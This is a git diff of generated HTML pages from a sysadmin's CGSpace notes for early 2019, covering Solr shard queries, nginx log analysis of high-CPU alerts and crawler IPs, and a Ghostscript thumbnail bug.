print(results.hits)
595
</code></pre><ul>
<li>So I guess I need to figure out how to use join queries and maybe even switch to using raw Python requests with JSON</li>
<li>This enumerates the list of Solr cores and returns JSON format:</li>
</ul>
<pre><code>http://localhost:3000/solr/admin/cores?action=STATUS&amp;wt=json
<pre tabindex="0"><code>http://localhost:3000/solr/admin/cores?action=STATUS&amp;wt=json
</code></pre><ul>
<li>I think I figured out how to search across shards, I needed to give the whole URL to each other core</li>
<li>Now I get more results when I start adding the other statistics cores:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound&lt;result name=&quot;response&quot; numFound=&quot;2061320&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;16280292&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;25606142&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;31532212&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound&lt;result name=&#34;response&#34; numFound=&#34;2061320&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;16280292&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;25606142&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;31532212&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
</code></pre><ul>
<li>I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the <code>shards</code> parameter to each query to make the search distributed among the cores</li>
<li>I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a <code>shards</code> query string</li>
@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/
</ul>
</li>
</ul>
<pre><code>$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;275&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;275&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
</code></pre><h2 id="2019-01-22">2019-01-22</h2>
<ul>
<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v0.9.0">version 0.9.0 of the dspace-statistics-api</a> to address the issue of querying multiple Solr statistics shards</li>
@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>I deployed it on CGSpace (linode18) and restarted the indexer as well</li>
<li>Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Jan/2019:1(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Jan/2019:1(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
155 40.77.167.106
176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
189 107.21.16.70
@ -939,12 +939,12 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>35.237.175.180 is known to us</li>
<li>I don&rsquo;t think we&rsquo;ve seen 196.191.127.37 before. Its user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
</code></pre><ul>
<li>Interestingly this IP is located in Addis Ababa&hellip;</li>
<li>Another interesting one is 154.113.73.30, which is apparently at IITA Nigeria and uses the user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
</code></pre><h2 id="2019-01-23">2019-01-23</h2>
<ul>
<li>Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:</li>
@ -952,6 +952,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/ILRI?src=hash&amp;ref_src=twsrc%5Etfw">#ILRI</a> research: Towards unlocking the potential of the hides and skins value chain in Somaliland <a href="https://t.co/EZH7ALW4dp">https://t.co/EZH7ALW4dp</a></p>&mdash; ILRI.org (@ILRI) <a href="https://twitter.com/ILRI/status/1086330519904673793?ref_src=twsrc%5Etfw">January 18, 2019</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<ul>
<li>The shortened link is <a href="goo.gl/fb/VRj9Gq">goo.gl/fb/VRj9Gq</a> and it shows a &ldquo;Dynamic Link not found&rdquo; error from Firebase:</li>
</ul>
@ -979,13 +980,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<p>I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:</p>
</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/35501&#39;, &#39;10568/41728&#39;, &#39;10568/49622&#39;, &#39;10568/56589&#39;, &#39;10568/56592&#39;, &#39;10568/65064&#39;, &#39;10568/65718&#39;, &#39;10568/65719&#39;, &#39;10568/67373&#39;, &#39;10568/67731&#39;, &#39;10568/68235&#39;, &#39;10568/68546&#39;, &#39;10568/69089&#39;, &#39;10568/69160&#39;, &#39;10568/69419&#39;, &#39;10568/69556&#39;, &#39;10568/70131&#39;, &#39;10568/70252&#39;, &#39;10568/70978&#39;))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
COPY 1109
</code></pre><ul>
<li>Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP</li>
<li>Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 54.226.25.74
241 40.77.167.13
272 46.101.86.248
@ -1019,7 +1020,7 @@ COPY 1109
<p>Just to make sure these were not uploaded by the user or something, I manually forced the regeneration of these with DSpace&rsquo;s <code>filter-media</code>:</p>
</li>
</ul>
<pre><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98391
</code></pre><ul>
<li>Both of these were successful, so there must have been an update to ImageMagick or Ghostscript in Ubuntu since early 2018-12</li>
@ -1034,17 +1035,17 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
<li>I re-compiled Arch&rsquo;s ghostscript with the patch and then I was able to generate a thumbnail from one of the <a href="https://cgspace.cgiar.org/handle/10568/98390">troublesome PDFs</a></li>
<li>Before and after:</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
Food safety Kenya fruits.pdf[0]=&gt;Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1747.
</code></pre><ul>
<li>I reported it to the Arch Linux bug tracker (<a href="https://bugs.archlinux.org/task/61513">61513</a>)</li>
<li>I told Atmire to go ahead with the Metadata Quality Module addition based on our <code>5_x-dev</code> branch (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">657</a>)</li>
<li>Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
305 3.81.136.184
306 3.83.14.11
306 52.54.252.47
@ -1059,7 +1060,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>45.5.186.2 is CIAT and 66.249.64.155 is Google&hellip; hmmm.</li>
<li>Linode sent another alert this morning, here are the top ten IPs active during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
360 3.89.134.93
362 34.230.15.139
366 100.24.48.177
@ -1073,7 +1074,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</code></pre><ul>
<li>Just double checking what CIAT is doing, they are mainly hitting the REST API:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:&quot; | grep 45.5.186.2 | grep -Eo &quot;GET /(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:&#34; | grep 45.5.186.2 | grep -Eo &#34;GET /(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
</code></pre><ul>
<li>CIAT&rsquo;s community currently has 12,000 items in it so this is normal</li>
<li>The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again&hellip;</li>
@ -1102,7 +1103,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 40.77.167.108
191 157.55.39.2
263 34.218.226.147
@ -1132,7 +1133,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 207.46.13.50
105 41.204.190.40
117 34.218.226.147
@ -1153,7 +1154,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
310 45.5.184.2
425 5.143.231.39
526 54.70.40.11
@ -1168,12 +1169,12 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>Of course there is CIAT&rsquo;s <code>45.5.186.2</code>, but also <code>45.5.184.2</code> appears to be CIAT&hellip; I wonder why they have two harvesters?</li>
<li><code>199.47.87.140</code> and <code>199.47.87.141</code> is TurnItIn with the following user agent:</li>
</ul>
<pre><code>TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
<pre tabindex="0"><code>TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
</code></pre><h2 id="2019-01-29">2019-01-29</h2>
<ul>
<li>Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Jan/2019:0(3|4|5|6|7)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Jan/2019:0(3|4|5|6|7)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
334 45.5.184.72
429 66.249.66.223
522 35.237.175.180
@ -1198,7 +1199,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
273 46.101.86.248
301 35.237.175.180
334 45.5.184.72
@ -1216,7 +1217,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:(16|17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:(16|17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
436 18.196.196.108
460 157.55.39.168
460 207.46.13.96
@ -1227,7 +1228,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
1601 85.25.237.71
1894 66.249.66.219
2610 45.5.184.2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;31/Jan/2019:0(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;31/Jan/2019:0(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
318 207.46.13.242
334 45.5.184.72
486 35.237.175.180
@ -1242,7 +1243,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li><code>45.5.186.2</code> and <code>45.5.184.2</code> are CIAT as always</li>
<li><code>85.25.237.71</code> is some new server in Germany that I&rsquo;ve never seen before with the user agent:</li>
</ul>
<pre><code>Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
<pre tabindex="0"><code>Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
</code></pre><!-- raw HTML omitted -->
@ -1264,15 +1265,15 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -12,7 +12,7 @@
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -49,7 +49,7 @@ sys 0m1.979s
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -102,12 +102,12 @@ sys 0m1.979s
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -153,7 +153,7 @@ sys 0m1.979s
<p class="blog-post-meta">
<time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,7 +163,7 @@ sys 0m1.979s
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -179,7 +179,7 @@ sys 0m1.979s
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -198,7 +198,7 @@ sys 0m1.979s
<ul>
<li>Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Feb/2019:0(1|2|3|4|5)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Feb/2019:0(1|2|3|4|5)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
284 18.195.78.144
329 207.46.13.32
417 35.237.175.180
@ -219,7 +219,7 @@ sys 0m1.979s
<li>This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!</li>
<li>Here are the top IPs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
325 85.25.237.71
340 45.5.184.72
431 5.143.231.8
@ -234,11 +234,11 @@ sys 0m1.979s
<li><code>45.5.184.2</code> is CIAT, <code>70.32.83.92</code> and <code>205.186.128.185</code> are Macaroni Bros harvesters for CCAFS I think</li>
<li><code>195.201.104.240</code> is a new IP address in Germany with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>This user was making 2060 requests per minute this morning&hellip; seems like I should try to block this type of behavior heuristically, regardless of user agent!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019&quot; | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019&#34; | grep 195.201.104.240 | grep -o -E &#39;03/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 20
19 03/Feb/2019:07:42
20 03/Feb/2019:07:12
21 03/Feb/2019:07:27
@ -262,7 +262,7 @@ sys 0m1.979s
</code></pre><ul>
<li>At least they re-used their Tomcat session!</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240&#39; dspace.log.2019-02-03 | sort | uniq | wc -l
1
</code></pre><ul>
